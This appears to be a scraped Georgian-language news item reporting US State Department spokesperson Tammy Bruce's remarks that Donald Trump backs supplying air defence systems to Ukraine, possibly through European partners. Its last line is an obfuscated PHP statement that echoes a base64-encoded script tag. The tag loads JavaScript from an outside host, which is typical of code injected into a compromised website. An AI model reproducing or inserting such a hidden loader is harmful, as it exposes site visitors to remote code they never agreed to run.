gorgia
jaluzi

დონალდ ტრამპი უკრაინისთვის საჰაერო თავდაცვის სისტემების მიწოდებას მხარს უჭერს, - ამის შესახებ აშშ-ის სახელმწიფო დეპარტამენტის პრესსპიკერმა, ტემი ბრიუსმა ბრიფინგზე განაცხადა.

მისივე განცხადებით, აშშ უკრაინის „უდიდესი მხარდამჭერი და დამცველია“.

„ჩვენ გვსურს, რომ მათ საჰაერო თავდაცვის შესაძლებლობები ჰქონდეთ. გვსურს, რომ მათკენ მიმავალი რაკეტებისთვის წინააღმდეგობის გაწევა შეეძლოთ“, - განაცხადა ტემი ბრიუსმა.

მისი თქმით, აშშ განიხილავს იმას, რომ „ევროპელმა პარტნიორებმა, რომლებსაც საჰაერო თავდაცვის სისტემები აქვთ, ისინი უკრაინას გადასცენ“.

„ამ პროცესში რამდენიმე მხარეა ჩართული და სახელმწიფო დეპარტამენტი არ მონაწილეობს. საქმე საბრძოლო მასალების შესყიდვებს ეხება“, - აღნიშნა აშშ-ის სახელმწიფო დეპარტამენტის პრესსპიკერმა.

81
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");